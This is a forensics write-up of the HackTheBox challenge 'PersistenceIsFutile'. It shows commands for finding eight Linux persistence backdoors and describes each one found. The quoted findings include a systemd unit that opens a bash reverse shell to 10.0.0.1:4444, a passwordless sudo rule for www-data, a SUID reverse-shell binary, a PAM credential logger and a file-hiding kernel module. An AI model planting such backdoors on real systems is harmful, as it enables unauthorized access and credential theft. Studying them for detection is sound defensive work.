PersistenceIsFutile is a Moderate-difficulty HackTheBox forensics challenge. The scenario is a compromised Linux production server. The IR team found eight backdoors before going offline, documented nothing useful, and left you to clean the machine. No hints about what the backdoors are or where they are hiding.
Methodology
Eight unknown backdoors on a Linux system requires systematic enumeration of persistence mechanisms rather than hunting for specific things. Start broad and work toward the subtle.
The first four: obvious locations
# New user accounts
grep -v "nologin\|false" /etc/passwd | grep -v "^root"
# backdoor:x:1001:1001::/home/backdoor:/bin/bash
# Cron jobs across all users
for user in $(cut -d: -f1 /etc/passwd); do crontab -u $user -l 2>/dev/null; done
cat /etc/cron* /var/spool/cron/crontabs/* 2>/dev/null
# Entry running /tmp/.hidden/update.sh every minute
# SSH authorized_keys
find /home /root -name authorized_keys 2>/dev/null -exec cat {} \;
# Unexpected public key in /root/.ssh/authorized_keys
# Sudo rules
cat /etc/sudoers /etc/sudoers.d/*
# www-data ALL=(ALL) NOPASSWD: ALLThe sudo rule giving www-data full root access with no password is particularly dangerous. Any webshell running as www-data has an instant root escalation path.
The next four: less obvious
# SUID binaries in unexpected locations
find / -perm -4000 -type f 2>/dev/null | grep -v "^/usr/bin\|^/usr/sbin\|^/bin\|^/sbin"
# /opt/support/updater (opens a reverse shell when executed, runs as root via SUID)# Systemd service units modified recently
find /etc/systemd /usr/lib/systemd -name "*.service" -newer /etc/hostname 2>/dev/null
# /etc/systemd/system/network-check.service
cat /etc/systemd/system/network-check.service
# ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'# PAM configuration
grep -r "pam_exec\|requisite\|sufficient" /etc/pam.d/ | grep -v "^#"
# Modified /etc/pam.d/common-auth logging credentials to /var/log/.syslog# Kernel modules
lsmod | awk '{print $1}' | while read mod; do
if ! modinfo $mod 2>/dev/null | grep -q "^filename:"; then
echo "Suspicious: $mod"
fi
done
# netfilter_helper is loaded but not in any installed packageThe kernel module was hooking the getdents syscall to hide its own files from directory listings. That is why the hidden cron script and hidden syslog file were not visible in simple ls output.
Key takeaway
Persistence hunting on Linux is an enumeration problem. Comparing installed binaries against their package checksums and watching for recently modified files in system directories catches a lot of what manual inspection misses. The attackers who are hardest to find use modified legitimate files rather than new ones and names that closely resemble legitimate system components.